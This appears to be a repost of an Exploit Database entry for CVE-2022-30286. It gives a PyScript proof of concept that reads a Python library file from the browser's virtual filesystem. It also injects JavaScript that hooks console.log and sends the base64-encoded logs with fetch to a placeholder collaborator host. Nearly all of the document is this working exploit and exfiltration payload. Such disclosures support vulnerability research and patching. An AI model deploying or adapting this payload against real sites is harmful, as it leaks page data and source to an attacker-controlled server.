PyScript – Read Remote Python Source Code

• Exploit Database
• 17 阅读

• 作者： Momen Eldawakhly
  日期： 2022-05-11
• 类别：

  • remote
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/50918/

• # Exploit Title: PyScript Remote Emscripten VMemory Python libraries
  Source Codes Read
  # Date: 5-9-2022
  # Exploit Author: Momen Eldawakhly (Cyber Guy)
  # Vendor Homepage: https://pyscript.net/
  # Software Link: https://github.com/pyscript/pyscript
  # Version: 2022-05-04-Alpha
  # Tested on: Ubuntu Apache Server
  # CVE : CVE-2022-30286
  
  <py-script>
  x = "CyberGuy"
  if x == "CyberGuy":
  with open('/lib/python3.10/asyncio/tasks.py') as output:
  contents = output.read()
  print(contents)
  print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
  </py-script>